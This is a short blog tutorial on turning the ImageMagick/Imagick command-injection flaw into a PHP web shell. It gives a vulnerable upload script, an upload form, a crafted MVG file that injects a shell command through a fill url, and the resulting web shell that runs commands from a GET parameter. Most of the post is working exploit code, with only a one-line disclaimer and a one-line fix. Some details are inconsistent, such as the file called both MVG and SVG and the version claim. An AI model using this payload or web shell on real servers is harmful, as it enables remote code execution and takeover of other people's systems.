comment 0

Create PHP Shell using Imagick (Image Magick) Vulnerability



Please don’t use this information to attack someone else’s application. Instead use this to protect yourself from being compromise on this particular vulnerability.

This hack will work on Image Magick version 3.3.0 and below

Below is a sample php code that will accept an uploaded file. Assuming this php script will only accept image files including .mvg files. (I’m too lazy to add a script that will check for file extensions. I’m sure you’ll understand 😛 )

imagick.php


<?php
if(isset($_FILES) && !empty($_FILES)) {
$thumb = new Imagick();
$thumb->readImage($_FILES['img']['tmp_name']);
$thumb->writeImage('/tmp/output.jpg');
$thumb->clear();
$thumb->destroy();
}

This script will simply process your uploaded file using imagick extension on PHP

Now, let’s create a form that will accept a file and submit it to our php script.
form.html


<for action="imagick.php" enctype="multipart/form-data" method="post">
<input name="img" type="file" />
<input type="submit" />
</form>

All is set. Now all we need to do is upload the image file. But first, We need to create the image file itself.

NOTE: We need to save our file as SVG for our little trick to work.

img.mvg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/image.jpg"|echo \<\?php exec\(\$\_GET\[\"cmd\"\]\,\$a\, \$b \)\; echo \"\<pre\>\"\; print\_r\(\$a\)\; > /path/to/your/shell.php")'
pop graphic-context

Now that we have all the files. All that is left to do is upload img.mvg file using form.html and let imagick.php process it.

What happens during the upload? Eventually, imagick will process our img.mvg and for some reason, imagick will execute the command as shell script after the character `|` on the url parameter as you have seen on our img.svg file on line 3. That means it will create a file called shell.php on the path that you specified with a content like this:


<?php exec($_GET["cmd"],$a, $b ); echo "<pre>"; print_r($a);

And there you go. You already have created a PHP Shell using Imagick Vulnerability.

 
PS: Your path to shell file needs to be accessible via url so you can execute your PHP shell

To protect yourself from this vulnerability, update your Imagick extension or use GD Library instead 😀


Leave a Reply

Your email address will not be published. Required fields are marked *